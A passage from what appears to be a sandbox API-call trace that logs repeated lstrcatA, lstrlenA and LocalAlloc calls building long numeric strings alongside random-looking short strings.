lpString1="13561263874477447744774477") returned="13561263874477447744774477" [0117.303] lstrcatA (in: lpString1="13561263874477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774") returned="135612638744774477447744774" [0117.303] lstrlenA (lpString="YVK3AZDS") returned 8 [0117.303] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.303] lstrcatA (in: lpString1="1356126387447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447") returned="13561263874477447744774477447" [0117.303] lstrcatA (in: lpString1="13561263874477447744774477447", lpString2="7" | out: lpString1="135612638744774477447744774477") returned="135612638744774477447744774477" [0117.303] lstrcatA (in: lpString1="135612638744774477447744774477", lpString2="4" | out: lpString1="1356126387447744774477447744774") returned="1356126387447744774477447744774" [0117.303] lstrlenA (lpString="YVK3AZDS") returned 8 [0117.303] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.303] lstrcatA (in: lpString1="13561263874477447744774477447744", lpString2="7" | out: lpString1="135612638744774477447744774477447") returned="135612638744774477447744774477447" [0117.303] lstrcatA (in: lpString1="135612638744774477447744774477447", lpString2="7" | out: lpString1="1356126387447744774477447744774477") returned="1356126387447744774477447744774477" [0117.303] lstrcatA (in: lpString1="1356126387447744774477447744774477", lpString2="4" | out: lpString1="13561263874477447744774477447744774") returned="13561263874477447744774477447744774" [0117.303] lstrlenA (lpString="YVK3AZDS") returned 8 [0117.303] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.303] lstrcatA (in: lpString1="135612638744774477447744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447744774477447") returned="1356126387447744774477447744774477447" [0117.303] lstrcatA (in: lpString1="1356126387447744774477447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477447744774477") returned="13561263874477447744774477447744774477" [0117.303] lstrcatA (in: lpString1="13561263874477447744774477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774477447744774") returned="135612638744774477447744774477447744774" [0117.303] lstrlenA (lpString="YVK3AZDS") returned 8 [0117.303] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.304] lstrcatA (in: lpString1="1356126387447744774477447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447744774477447") returned="13561263874477447744774477447744774477447" [0117.304] lstrcatA (in: lpString1="13561263874477447744774477447744774477447", lpString2="98" | out: lpString1="1356126387447744774477447744774477447744798") returned="1356126387447744774477447744774477447744798" [0117.304] lstrcatA (in: lpString1="1356126387447744774477447744774477447744798", lpString2="9" | out: lpString1="13561263874477447744774477447744774477447989") returned="13561263874477447744774477447744774477447989" [0117.304] lstrcatA (in: lpString1="13561263874477447744774477447744774477447989", lpString2="00" | out: lpString1="1356126387447744774477447744774477447744798900") returned="1356126387447744774477447744774477447744798900" [0117.304] lstrcatA (in: lpString1="", lpString2="1" | out: lpString1="1") returned="1" [0117.304] lstrcatA (in: lpString1="1", lpString2="3" | out: lpString1="13") returned="13" [0117.304] lstrcatA (in: lpString1="13", lpString2="5" | out: lpString1="135") returned="135" [0117.304] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x5bf6f8 [0117.304] lstrcatA (in: lpString1="135", lpString2="6" | out: lpString1="1356") returned="1356" [0117.304] lstrcatA (in: lpString1="1356", lpString2="1" | out: lpString1="13561") returned="13561" [0117.304] lstrcatA (in: lpString1="13561", lpString2="2" | out: lpString1="135612") returned="135612" [0117.304] lstrcatA (in: lpString1="135612", lpString2="6" | out: lpString1="1356126") returned="1356126" [0117.304] lstrcatA (in: lpString1="1356126", lpString2="3" | out: lpString1="13561263") returned="13561263" [0117.304] lstrcatA (in: lpString1="13561263", lpString2="8" | out: lpString1="135612638") returned="135612638" [0117.304] lstrcatA (in: lpString1="135612638", lpString2="7" | out: lpString1="1356126387") returned="1356126387" [0117.304] lstrcatA (in: lpString1="1356126387", lpString2="4" | out: lpString1="13561263874") returned="13561263874" [0117.304] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.304] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.304] lstrcatA (in: lpString1="135612638744", lpString2="7" | out: lpString1="1356126387447") returned="1356126387447" [0117.304] lstrcatA (in: lpString1="1356126387447", lpString2="7" | out: lpString1="13561263874477") returned="13561263874477" [0117.304] lstrcatA (in: lpString1="13561263874477", lpString2="4" | out: lpString1="135612638744774") returned="135612638744774" [0117.304] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.304] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.304] lstrcatA (in: lpString1="1356126387447744", lpString2="7" | out: lpString1="13561263874477447") returned="13561263874477447" [0117.304] lstrcatA (in: lpString1="13561263874477447", lpString2="7" | out: lpString1="135612638744774477") returned="135612638744774477" [0117.304] lstrcatA (in: lpString1="135612638744774477", lpString2="4" | out: lpString1="1356126387447744774") returned="1356126387447744774" [0117.304] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.304] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.304] lstrcatA (in: lpString1="13561263874477447744", lpString2="7" | out: lpString1="135612638744774477447") returned="135612638744774477447" [0117.304] lstrcatA (in: lpString1="135612638744774477447", lpString2="7" | out: lpString1="1356126387447744774477") returned="1356126387447744774477" [0117.304] lstrcatA (in: lpString1="1356126387447744774477", lpString2="4" | out: lpString1="13561263874477447744774") returned="13561263874477447744774" [0117.305] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.305] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.305] lstrcatA (in: lpString1="135612638744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447") returned="1356126387447744774477447" [0117.305] lstrcatA (in: lpString1="1356126387447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477") returned="13561263874477447744774477" [0117.305] lstrcatA (in: lpString1="13561263874477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774") returned="135612638744774477447744774" [0117.305] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.305] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.305] lstrcatA (in: lpString1="1356126387447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447") returned="13561263874477447744774477447" [0117.305] lstrcatA (in: lpString1="13561263874477447744774477447", lpString2="7" | out: lpString1="135612638744774477447744774477") returned="135612638744774477447744774477" [0117.305] lstrcatA (in: lpString1="135612638744774477447744774477", lpString2="4" | out: lpString1="1356126387447744774477447744774") returned="1356126387447744774477447744774" [0117.305] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.305] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.305] lstrcatA (in: lpString1="13561263874477447744774477447744", lpString2="7" | out: lpString1="135612638744774477447744774477447") returned="135612638744774477447744774477447" [0117.305] lstrcatA (in: lpString1="135612638744774477447744774477447", lpString2="7" | out: lpString1="1356126387447744774477447744774477") returned="1356126387447744774477447744774477" [0117.305] lstrcatA (in: lpString1="1356126387447744774477447744774477", lpString2="4" | out: lpString1="13561263874477447744774477447744774") returned="13561263874477447744774477447744774" [0117.305] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.305] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.305] lstrcatA (in: lpString1="135612638744774477447744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447744774477447") returned="1356126387447744774477447744774477447" [0117.305] lstrcatA (in: lpString1="1356126387447744774477447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477447744774477") returned="13561263874477447744774477447744774477" [0117.305] lstrcatA (in: lpString1="13561263874477447744774477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774477447744774") returned="135612638744774477447744774477447744774" [0117.305] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.305] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.305] lstrcatA (in: lpString1="1356126387447744774477447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447744774477447") returned="13561263874477447744774477447744774477447" [0117.305] lstrcatA (in: lpString1="13561263874477447744774477447744774477447", lpString2="7" | out: lpString1="135612638744774477447744774477447744774477") returned="135612638744774477447744774477447744774477" [0117.305] lstrcatA (in: lpString1="135612638744774477447744774477447744774477", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774") returned="1356126387447744774477447744774477447744774" [0117.305] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.305] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.306] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744", lpString2="7" | out: lpString1="135612638744774477447744774477447744774477447") returned="135612638744774477447744774477447744774477447" [0117.306] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447", lpString2="7" | out: lpString1="1356126387447744774477447744774477447744774477") returned="1356126387447744774477447744774477447744774477" [0117.306] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774") returned="13561263874477447744774477447744774477447744774" [0117.306] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.306] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.306] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447744774477447744774477447") returned="1356126387447744774477447744774477447744774477447" [0117.306] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477447744774477447744774477") returned="13561263874477447744774477447744774477447744774477" [0117.306] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744774") returned="135612638744774477447744774477447744774477447744774" [0117.306] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.306] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744" [0117.306] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447744774477447744774477447") returned="13561263874477447744774477447744774477447744774477447" [0117.306] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447", lpString2="7" | out: lpString1="135612638744774477447744774477447744774477447744774477") returned="135612638744774477447744774477447744774477447744774477" [0117.306] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744774") returned="1356126387447744774477447744774477447744774477447744774" [0117.306] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.306] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744" [0117.306] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744", lpString2="7" | out: lpString1="135612638744774477447744774477447744774477447744774477447") returned="135612638744774477447744774477447744774477447744774477447" [0117.306] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477447", lpString2="7" | out: lpString1="1356126387447744774477447744774477447744774477447744774477") returned="1356126387447744774477447744774477447744774477447744774477" [0117.306] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774477", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744774") returned="13561263874477447744774477447744774477447744774477447744774" [0117.306] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.306] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744774477447744" [0117.306] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447744774477447744774477447744774477447") returned="1356126387447744774477447744774477447744774477447744774477447" [0117.306] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477447744774477447744774477447744774477") returned="13561263874477447744774477447744774477447744774477447744774477" [0117.306] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744774477447744774") returned="135612638744774477447744774477447744774477447744774477447744774" [0117.306] lstrlenA (lpString="ZMTBHPX1BYWYAV") returned 14 [0117.306] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744774477447744" [0117.306] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447744774477447744774477447744774477447") returned="13561263874477447744774477447744774477447744774477447744774477447" [0117.307] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744774477447", lpString2="98" | out: lpString1="1356126387447744774477447744774477447744774477447744774477447744798") returned="1356126387447744774477447744774477447744774477447744774477447744798" [0117.307] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774477447744798", lpString2="9" | out: lpString1="13561263874477447744774477447744774477447744774477447744774477447989") returned="13561263874477447744774477447744774477447744774477447744774477447989" [0117.307] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744774477447989", lpString2="00" | out: lpString1="1356126387447744774477447744774477447744774477447744774477447744798900") returned="1356126387447744774477447744774477447744774477447744774477447744798900" [0117.307] lstrcatA (in: lpString1="", lpString2="1" | out: lpString1="1") returned="1" [0117.307] lstrcatA (in: lpString1="1", lpString2="3" | out: lpString1="13") returned="13" [0117.307] lstrcatA (in: lpString1="13", lpString2="5" | out: lpString1="135") returned="135" [0117.307] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x5c25f0 [0117.307] lstrcatA (in: lpString1="135", lpString2="6" | out: lpString1="1356") returned="1356" [0117.307] lstrcatA (in: lpString1="1356", lpString2="1" | out: lpString1="13561") returned="13561" [0117.307] lstrcatA (in: lpString1="13561", lpString2="2" | out: lpString1="135612") returned="135612" [0117.307] lstrcatA (in: lpString1="135612", lpString2="6" | out: lpString1="1356126") returned="1356126" [0117.307] lstrcatA (in: lpString1="1356126", lpString2="3" | out: lpString1="13561263") returned="13561263" [0117.307] lstrcatA (in: lpString1="13561263", lpString2="8" | out: lpString1="135612638") returned="135612638" [0117.307] lstrcatA (in: lpString1="135612638", lpString2="7" | out: lpString1="1356126387") returned="1356126387" [0117.307] lstrcatA (in: lpString1="1356126387", lpString2="4" | out: lpString1="13561263874") returned="13561263874" [0117.307] lstrlenA (lpString="39PGO") returned 5 [0117.307] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.307] lstrcatA (in: lpString1="135612638744", lpString2="7" | out: lpString1="1356126387447") returned="1356126387447" [0117.307] lstrcatA (in: lpString1="1356126387447", lpString2="7" | out: lpString1="13561263874477") returned="13561263874477" [0117.307] lstrcatA (in: lpString1="13561263874477", lpString2="4" | out: lpString1="135612638744774") returned="135612638744774" [0117.307] lstrlenA (lpString="39PGO") returned 5 [0117.307] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.307] lstrcatA (in: lpString1="1356126387447744", lpString2="7" | out: lpString1="13561263874477447") returned="13561263874477447" [0117.307] lstrcatA (in: lpString1="13561263874477447", lpString2="7" | out: lpString1="135612638744774477") returned="135612638744774477" [0117.307] lstrcatA (in: lpString1="135612638744774477", lpString2="4" | out: lpString1="1356126387447744774") returned="1356126387447744774" [0117.307] lstrlenA (lpString="39PGO") returned 5 [0117.307] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.307] lstrcatA (in: lpString1="13561263874477447744", lpString2="7" | out: lpString1="135612638744774477447") returned="135612638744774477447" [0117.307] lstrcatA (in: lpString1="135612638744774477447", lpString2="7" | out: lpString1="1356126387447744774477") returned="1356126387447744774477" [0117.307] lstrcatA (in: lpString1="1356126387447744774477", lpString2="4" | out: lpString1="13561263874477447744774") returned="13561263874477447744774" [0117.308] lstrlenA (lpString="39PGO") returned 5 [0117.308] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.308] lstrcatA (in: lpString1="135612638744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447") returned="1356126387447744774477447" [0117.308] lstrcatA (in: lpString1="1356126387447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477") returned="13561263874477447744774477" [0117.308] lstrcatA (in: lpString1="13561263874477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774") returned="135612638744774477447744774" [0117.308] lstrlenA (lpString="39PGO") returned 5 [0117.308] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.308] lstrcatA (in: lpString1="1356126387447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447") returned="13561263874477447744774477447" [0117.308] lstrcatA (in: lpString1="13561263874477447744774477447", lpString2="98" | out: lpString1="1356126387447744774477447744798") returned="1356126387447744774477447744798" [0117.308] lstrcatA (in: lpString1="1356126387447744774477447744798", lpString2="9" | out: lpString1="13561263874477447744774477447989") returned="13561263874477447744774477447989" [0117.308] lstrcatA (in: lpString1="13561263874477447744774477447989", lpString2="00" | out: lpString1="1356126387447744774477447744798900") returned="1356126387447744774477447744798900" [0117.308] lstrcatA (in: lpString1="", lpString2="1" | out: lpString1="1") returned="1" [0117.308] lstrcatA (in: lpString1="1", lpString2="3" | out: lpString1="13") returned="13" [0117.308] lstrcatA (in: lpString1="13", lpString2="5" | out: lpString1="135") returned="135" [0117.308] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x5bf710 [0117.308] lstrcatA (in: lpString1="135", lpString2="6" | out: lpString1="1356") returned="1356" [0117.308] lstrcatA (in: lpString1="1356", lpString2="1" | out: lpString1="13561") returned="13561" [0117.308] lstrcatA (in: lpString1="13561", lpString2="2" | out: lpString1="135612") returned="135612" [0117.308] lstrcatA (in: lpString1="135612", lpString2="6" | out: lpString1="1356126") returned="1356126" [0117.308] lstrcatA (in: lpString1="1356126", lpString2="3" | out: lpString1="13561263") returned="13561263" [0117.308] lstrcatA (in: lpString1="13561263", lpString2="8" | out: lpString1="135612638") returned="135612638" [0117.308] lstrcatA (in: lpString1="135612638", lpString2="7" | out: lpString1="1356126387") returned="1356126387" [0117.308] lstrcatA (in: lpString1="1356126387", lpString2="4" | out: lpString1="13561263874") returned="13561263874" [0117.308] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.308] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.308] lstrcatA (in: lpString1="135612638744", lpString2="7" | out: lpString1="1356126387447") returned="1356126387447" [0117.308] lstrcatA (in: lpString1="1356126387447", lpString2="7" | out: lpString1="13561263874477") returned="13561263874477" [0117.309] lstrcatA (in: lpString1="13561263874477", lpString2="4" | out: lpString1="135612638744774") returned="135612638744774" [0117.309] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.309] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.309] lstrcatA (in: lpString1="1356126387447744", lpString2="7" | out: lpString1="13561263874477447") returned="13561263874477447" [0117.309] lstrcatA (in: lpString1="13561263874477447", lpString2="7" | out: lpString1="135612638744774477") returned="135612638744774477" [0117.309] lstrcatA (in: lpString1="135612638744774477", lpString2="4" | out: lpString1="1356126387447744774") returned="1356126387447744774" [0117.309] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.309] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.309] lstrcatA (in: lpString1="13561263874477447744", lpString2="7" | out: lpString1="135612638744774477447") returned="135612638744774477447" [0117.309] lstrcatA (in: lpString1="135612638744774477447", lpString2="7" | out: lpString1="1356126387447744774477") returned="1356126387447744774477" [0117.309] lstrcatA (in: lpString1="1356126387447744774477", lpString2="4" | out: lpString1="13561263874477447744774") returned="13561263874477447744774" [0117.309] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.309] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.309] lstrcatA (in: lpString1="135612638744774477447744", lpString2="7" | out: lpString1="1356126387447744774477447") returned="1356126387447744774477447" [0117.309] lstrcatA (in: lpString1="1356126387447744774477447", lpString2="7" | out: lpString1="13561263874477447744774477") returned="13561263874477447744774477" [0117.309] lstrcatA (in: lpString1="13561263874477447744774477", lpString2="4" | out: lpString1="135612638744774477447744774") returned="135612638744774477447744774" [0117.309] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.309] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.309] lstrcatA (in: lpString1="1356126387447744774477447744", lpString2="7" | out: lpString1="13561263874477447744774477447") returned="13561263874477447744774477447" [0117.309] lstrcatA (in: lpString1="13561263874477447744774477447", lpString2="7" | out: lpString1="135612638744774477447744774477") returned="135612638744774477447744774477" [0117.309] lstrcatA (in: lpString1="135612638744774477447744774477", lpString2="4" | out: lpString1="1356126387447744774477447744774") returned="1356126387447744774477447744774" [0117.309] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.309] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.309] lstrcatA (in: lpString1="13561263874477447744774477447744", lpString2="7" | out: lpString1="135612638744774477447744774477447") returned="135612638744774477447744774477447" [0117.309] lstrcatA (in: lpString1="135612638744774477447744774477447", lpString2="7" | out: lpString1="1356126387447744774477447744774477") returned="1356126387447744774477447744774477" [0117.309] lstrcatA (in: lpString1="1356126387447744774477447744774477", lpString2="4" | out: lpString1="13561263874477447744774477447744774") returned="13561263874477447744774477447744774" [0117.310] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.310] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.310] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.310] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.310] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.310] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.310] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.310] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.310] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.310] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744" [0117.310] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.310] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744774477447744" [0117.310] lstrlenA (lpString="10W42JTBOTWXJ") returned 13 [0117.310] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744774477447744" [0117.310] lstrlenA (lpString="6B9Z0XHFG8S") returned 11 [0117.310] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.310] lstrlenA (lpString="6B9Z0XHFG8S") returned 11 [0117.310] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.310] lstrlenA (lpString="6B9Z0XHFG8S") returned 11 [0117.310] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.311] lstrlenA (lpString="6B9Z0XHFG8S") returned 11 [0117.311] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.311] lstrlenA (lpString="6B9Z0XHFG8S") returned 11 [0117.311] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.311] lstrlenA (lpString="6B9Z0XHFG8S") returned 11 [0117.311] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.311] lstrlenA (lpString="6B9Z0XHFG8S") returned 11 [0117.311] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.311] lstrlenA (lpString="6B9Z0XHFG8S") returned 11 [0117.311] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.311] lstrlenA (lpString="6B9Z0XHFG8S") returned 11 [0117.311] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.311] lstrlenA (lpString="6B9Z0XHFG8S") returned 11 [0117.311] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.311] lstrlenA (lpString="6B9Z0XHFG8S") returned 11 [0117.311] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") returned="1356126387447744774477447744774477447744774477447744" [0117.311] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.311] lstrcatA (in: lpString1="13561263874", lpString2="4" | out: lpString1="135612638744") returned="135612638744" [0117.311] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.311] lstrcatA (in: lpString1="135612638744774", lpString2="4" | out: lpString1="1356126387447744") returned="1356126387447744" [0117.311] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.311] lstrcatA (in: lpString1="1356126387447744774", lpString2="4" | out: lpString1="13561263874477447744") returned="13561263874477447744" [0117.311] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.311] lstrcatA (in: lpString1="13561263874477447744774", lpString2="4" | out: lpString1="135612638744774477447744") returned="135612638744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="135612638744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744") returned="1356126387447744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="1356126387447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744") returned="13561263874477447744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="13561263874477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744") returned="135612638744774477447744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="135612638744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744") returned="1356126387447744774477447744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="1356126387447744774477447744774477447744774", lpString2="4" | out: lpString1="13561263874477447744774477447744774477447744") returned="13561263874477447744774477447744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="13561263874477447744774477447744774477447744774", lpString2="4" | out: lpString1="135612638744774477447744774477447744774477447744") returned="135612638744774477447744774477447744774477447744" [0117.312] lstrlenA (lpString="I9O8D1KO3KM1CR02Y") returned 17 [0117.312] lstrcatA (in: lpString1="135612638744774477447744774477447744774477447744774", lpString2="4" | out: lpString1="1356126387447744774477447744774477447744774477447744") 